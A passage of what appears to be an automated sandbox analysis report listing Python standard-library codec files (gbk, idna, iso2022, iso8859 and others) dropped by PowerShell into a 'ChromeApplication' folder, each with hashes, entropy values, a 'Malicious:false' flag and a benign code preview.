                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# gb2312.py: Python Unicode Codec for GB2312..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('gb2312')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='gb2312',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. strea

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\gbk.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1054
                                                                                                                                                                                                  Entropy (8bit):4.504465163109839
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:nBOEpqNOz+f/Xo1SKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9scJxFV:4Epq2P1k62VJjRU8njOxLnrxLbrLKPJd
                                                                                                                                                                                                  MD5:0D6CF4D6FFFB4B761BEBCEBC1D2C3CF3
                                                                                                                                                                                                  SHA1:64C7CD7A46E8CAE1CB9F0700035CA6BD2EC73C76
                                                                                                                                                                                                  SHA-256:9C7828E3B9661E39D4D75419A12B9D132FA9D0B4DAEC36F3DF51AD1C3A638DE3
                                                                                                                                                                                                  SHA-512:0F4F577C2FB46AB6B6D8DD6CFB5F89C8748F67E864D9AB6E3D92904BB0AE9EDB6239CABDF8A8F9B11238EEB60870EB819499B4A942E2D3B5CB7032F444246FCF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# gbk.py: Python Unicode Codec for GBK..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('gbk')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='gbk',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=Stre

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\hex_codec.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1563
                                                                                                                                                                                                  Entropy (8bit):4.660866418659877
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Xtc/QX1AIgs1AIc1wX1euM8ivIvPTKs3ntJxHjH:XS/QX/gs/cmX8uAA3TKsdrH
                                                                                                                                                                                                  MD5:1E55C95602534092B4DB3ED99CB9E67C
                                                                                                                                                                                                  SHA1:D1DBA179C7F3B0FF22D4F1713275D0C48637BB48
                                                                                                                                                                                                  SHA-256:5881C1AEEEB5F9CD27CE0E0E62AB9D6551F094955DBD52DC8184165DAF78AEBA
                                                                                                                                                                                                  SHA-512:84DACC6B4CBFBB99D7D6F0124EF1E7B26035C7249730EB1C185B60A750DE2548CA60E8A939DF8445D5DDDF1F8D397708A264D9FD7771C674C7DA889C306C9D93
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Python 'hex_codec' Codec - 2-digit hex content transfer encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import binascii....### Codec APIs....def hex_encode(input, errors='strict'):.. assert errors == 'strict'.. return (binascii.b2a_hex(input), len(input))....def hex_decode(input, errors='strict'):.. assert errors == 'strict'.. return (binascii.a2b_hex(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return hex_encode(input, errors).. def decode(self, input, errors='strict'):.. return hex_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. assert self.errors == 'strict'.. return binascii.b2a_hex(input)....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. assert self.errors == 'strict'..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\hp_roman8.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13789
                                                                                                                                                                                                  Entropy (8bit):4.607934099089844
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:zbhsuOTDvRFUrXPLouhIAs2+ijLoM69Ne/DD6e:STjuhIAlgM6G6e
                                                                                                                                                                                                  MD5:1332CCB5750EB756B2856CCAD9E18CC1
                                                                                                                                                                                                  SHA1:ACDBF93730FB0420EA5B77AFE7E3282669829EF4
                                                                                                                                                                                                  SHA-256:681FF6A2273BD64450E04FC6F04B2EC63015A91490E30A31E25ED193708C99D4
                                                                                                                                                                                                  SHA-512:6F43760A54CB494E48B8C9A659505727246AEAF539AD4A35AFE6F4F5D0E4A84C2F5F0ED5055794DE2D575E78D5A5D1497EB795F35D8F5533DF955587EBC38FD4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'hp_roman8.txt' with gencodec.py..... Based on data from ftp://dkuug.dk/i18n/charmaps/HP-ROMAN8 (Keld Simonsen).... Original source: LaserJet IIP Printer User's Manual HP part no.. 33471-90901, Hewlet-Packard, June 1989..... (Used with permission)...."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.Strea

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\hz.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1050
                                                                                                                                                                                                  Entropy (8bit):4.49858978606931
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:nvpqxOz+f/Xo1cZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ecJxFpz:vpqyP1ct62VJjRU8njOxLnrxLbrLK5Jd
                                                                                                                                                                                                  MD5:78235EEDFAE419F3CC13044D7890799B
                                                                                                                                                                                                  SHA1:5BF1944AC39D99B3777CCD61DB7FAE3FF0D3E936
                                                                                                                                                                                                  SHA-256:2601DC6EF938FF87BD2024B3C4785254F2B3DD4D8D34D8F63E254D7B8545B077
                                                                                                                                                                                                  SHA-512:F5B7383FC8CBBAA13E8D101DD264D0F7952CD3A681F6746B5D941381A7CD39BE808D3E15375CF3778AC80D026658D494FA410CE1904683BD873D91C55DA9CA41
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# hz.py: Python Unicode Codec for HZ..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('hz')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='hz',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamRe

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\idna.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9405
                                                                                                                                                                                                  Entropy (8bit):4.456033241276571
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:g2wxhP5XBQ/J/8V2zbxofjEY7pKrlIRYUnIzSGAy4DYvRv3:gPvPjp2zbIbwDcGx
                                                                                                                                                                                                  MD5:C2DAEBCCD1DE0B4535D537DB6658A6AA
                                                                                                                                                                                                  SHA1:B799688CC2CFDA6164308A6A78DF70AD59876DB7
                                                                                                                                                                                                  SHA-256:F62053A41EEA93F5953D1DE69C98FFD7F3E2D0E9AC984BA27A9BE37ADF0F4022
                                                                                                                                                                                                  SHA-512:83C7224EB66F7B4AD23B678B74EE054C27D8197EE708D5CCCFC4FA9E1775978608E09AA188594C5602160F93215C4F7B113C0C593C39502FA3CB163744DDAA54
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This module implements the RFCs 3490 (IDNA) and 3491 (Nameprep)....import stringprep, re, codecs..from unicodedata import ucd_3_2_0 as unicodedata....# IDNA section 3.1..dots = re.compile("[\u002E\u3002\uFF0E\uFF61]")....# IDNA section 5..ace_prefix = b"xn--"..sace_prefix = "xn--"....# This assumes query strings, so AllowUnassigned is true..def nameprep(label):.. # Map.. newlabel = [].. for c in label:.. if stringprep.in_table_b1(c):.. # Map to nothing.. continue.. newlabel.append(stringprep.map_table_b2(c)).. label = "".join(newlabel).... # Normalize.. label = unicodedata.normalize("NFKC", label).... # Prohibit.. for c in label:.. if stringprep.in_table_c12(c) or \.. stringprep.in_table_c22(c) or \.. stringprep.in_table_c3(c) or \.. stringprep.in_table_c4(c) or \.. stringprep.in_table_c5(c) or \.. stringprep.in_table_c6(c) or \.. stringprep.in_table_c7(c) or

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso2022_jp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1092
                                                                                                                                                                                                  Entropy (8bit):4.599723694318225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:n9qdOz0f/XojmKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ecJxFplR:9qmFU62VJjRU8njOxLnrxLbrLKZJxTz
                                                                                                                                                                                                  MD5:0607F8E6310A0B601897FF8EC76FF2C4
                                                                                                                                                                                                  SHA1:3839A936E2792722D3F157F11965BF510241C0FA
                                                                                                                                                                                                  SHA-256:7169767DD6732A80A0B665315588EF9CFF2DF4D495A86BC0BDD22B5C9F0644B9
                                                                                                                                                                                                  SHA-512:C763E0D3AFA5DBB7FA96D03A52F0F5828A61E8FF24523BF62A852C989DD3BFBBFC3DA4535B5401A78E47FE16F3EA33364BA63655D91A6A12516315E231F23B15
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# iso2022_jp.py: Python Unicode Codec for ISO2022_JP..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incremen

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso2022_jp_1.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1100
                                                                                                                                                                                                  Entropy (8bit):4.625134249310359
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:nhq1Oz0f/XojglKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9CcJxFplR:hquF8J62VJjRU8njOxLnrxLbrLK5JxTz
                                                                                                                                                                                                  MD5:4D2B0675DE1A9AFB3553B5D5E894020C
                                                                                                                                                                                                  SHA1:A9B6F704D09F7A0B5182BE7C3581D321BA4DDA76
                                                                                                                                                                                                  SHA-256:627D3BDB5D3BC70DD00E51199B689D1C225EFE747A2DB8D5938E6AF78263F572
                                                                                                                                                                                                  SHA-512:AC8E08AA4A2235BF20C563EC1A466B666A39F09CCD4AE681CD34DCF51754E3B8C860D557354691D170ABCDE43029B3B45E5597AADDED398577F9A90C74FADC57
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# iso2022_jp_1.py: Python Unicode Codec for ISO2022_JP_1..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_1')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_1',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso2022_jp_2.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1100
                                                                                                                                                                                                  Entropy (8bit):4.611453480597579
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:nnSqgOz0f/Xoj7ZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9VcJxFpz:nSq5F3t62VJjRU8njOxLnrxLbrLK0Jx/
                                                                                                                                                                                                  MD5:A4798D8B5DEE38BCCF3CBEAD235F392E
                                                                                                                                                                                                  SHA1:8971456D5A2C4A3255592399EE1141E119880774
                                                                                                                                                                                                  SHA-256:DC680A0E34DCE73756F0E3B5CBB23DD819022BE7E10F80E55289A5EAB9ED7C2E
                                                                                                                                                                                                  SHA-512:E329124E3ADA51C303556CA0C6B5B4644ED76E6F43C943BFE72F318928EF1DAA6121FE545480F4092F92B05CD25315D3E5B7ADB09E63985E9D8879BA3A751C2B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# iso2022_jp_2.py: Python Unicode Codec for ISO2022_JP_2..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_2')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_2',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso2022_jp_2004.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1112
                                                                                                                                                                                                  Entropy (8bit):4.645190214359865
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:n8q1sOz0f/XojvKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9FcJxFplR:8qnF/62VJjRU8njOxLnrxLbrLKoJxTz
                                                                                                                                                                                                  MD5:E1738D28D315C80A04908CDB21CBE7BD
                                                                                                                                                                                                  SHA1:D79BC1E83E0A2103909A7AB97DB3A456D21C0711
                                                                                                                                                                                                  SHA-256:C8CB592DF0CF38A6B7E8265C02D7784FB32052EF9AD94D0FF369889EDA540273
                                                                                                                                                                                                  SHA-512:BFDF5D44B36916C3B828EA1C599E644CB9D3ADBC0D2D4922F016F9DDD7EB424F8A937C19FA3EFBA0E9F4AC14ADFF3C0BA6B924130ED2D050C3A9BDDC2F4165C2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# iso2022_jp_2004.py: Python Unicode Codec for ISO2022_JP_2004..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_2004')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_2004',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. increme

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso2022_jp_3.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1100
                                                                                                                                                                                                  Entropy (8bit):4.625134249310359
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:nrq3Oz0f/XojUKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9IcJxFplR:rqkFa62VJjRU8njOxLnrxLbrLKnJxTz
                                                                                                                                                                                                  MD5:3E98055A4B7D99A49798F3012C4D9DDB
                                                                                                                                                                                                  SHA1:8579E49AA8080610BF40A51DC18B6DF5EEE56A2E
                                                                                                                                                                                                  SHA-256:2A2AE4368D962C2E7B5DB2F29EE89EFD5A7FDB881DEF523C21670E0D1A1C50CE
                                                                                                                                                                                                  SHA-512:DBA054816FC0022810D545D089BC62997BFE04143B579E59EF1DAD2D25DCAFC879BF00CADEA2DDF3CE850728E00911984590EA8C8C8D6EA1AF30F71AA97CEA76
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# iso2022_jp_3.py: Python Unicode Codec for ISO2022_JP_3..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_3')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_3',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso2022_jp_ext.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1108
                                                                                                                                                                                                  Entropy (8bit):4.633181613509048
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:npqNOz0f/XojaKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ycJxFplR:pq2Fg62VJjRU8njOxLnrxLbrLK5JxTz
                                                                                                                                                                                                  MD5:34E904E0F16F84EC0A001DFFCDE7514C
                                                                                                                                                                                                  SHA1:19BCD8776FB3239A003F4B5F04B7056B81D0A6C6
                                                                                                                                                                                                  SHA-256:5B4439C7DBE65638166A70C5404CABB72552019D1F497193C6689B86BD3C4C94
                                                                                                                                                                                                  SHA-512:F9DC1EA03840BD9763BC2B1521D2557FD0111682D1FF805FCCDA123508C3F23768F819FA26B2E097447595F70ABCB2737C9B153B848D2687DB3E2E9E645801EC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# iso2022_jp_ext.py: Python Unicode Codec for ISO2022_JP_EXT..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_ext')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_ext',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incremental

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso2022_kr.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1092
                                                                                                                                                                                                  Entropy (8bit):4.584383388529371
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:nJIBqqOz0f/XojfKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ncJxFpz:EqHFn62VJjRU8njOxLnrxLbrLKGJxTz
                                                                                                                                                                                                  MD5:F907851FF35FB61EB485B2C163A2BCCB
                                                                                                                                                                                                  SHA1:CA280AC9C832208B01242601F7F3A78803A1CDF9
                                                                                                                                                                                                  SHA-256:FD9EFD7094361F6557D00857E332D7229E922597336A0714FB0FA2402C954029
                                                                                                                                                                                                  SHA-512:4992572D79613856F84F7332C1D7C588B2BA4256613FCAB21BEF6C74BF8D50F2D96CAA2ABFF2C92D040DDFE45A328B7495BCB29CD51580577D5F5A5527CC469D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# iso2022_kr.py: Python Unicode Codec for ISO2022_KR..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_kr')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_kr',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incremen

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_1.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13483
                                                                                                                                                                                                  Entropy (8bit):4.571059193460173
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:qHhsuOTDvRAUrXPLouhIAs2+ijLMZt6CJTd12:HTauhIAlEZt680
                                                                                                                                                                                                  MD5:0466703A1EB5752CDD5115B2D738D822
                                                                                                                                                                                                  SHA1:03354F0D1406A99B9934276675759C6002D4A901
                                                                                                                                                                                                  SHA-256:CCFDBA207B483DCD38673D85B6E2A773A5BF64E8AE9DB7E90A01F8014E62B24A
                                                                                                                                                                                                  SHA-512:3D7B957FF194B69AC9DE7FE59BD03DB29EBD076456FC93FD3E6AFB6B09EACB8C5D327A6E17719C02AE5F71E8428BB55FAB633955861699BC4FF90C3F80D0A783
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_1 generated from 'MAPPINGS/ISO8859/8859-1.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-1',.. encode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_10.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13896
                                                                                                                                                                                                  Entropy (8bit):4.591898710758108
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:OHhsuOTDvR4UrXPLouhIAs2+ijLWDf6z6iC:bTmuhIAleu+
                                                                                                                                                                                                  MD5:28ADCF051DD15E45A38CE929864BBD83
                                                                                                                                                                                                  SHA1:A09E4C13D00393CE6C2F3CF9665455D74BBF8A0A
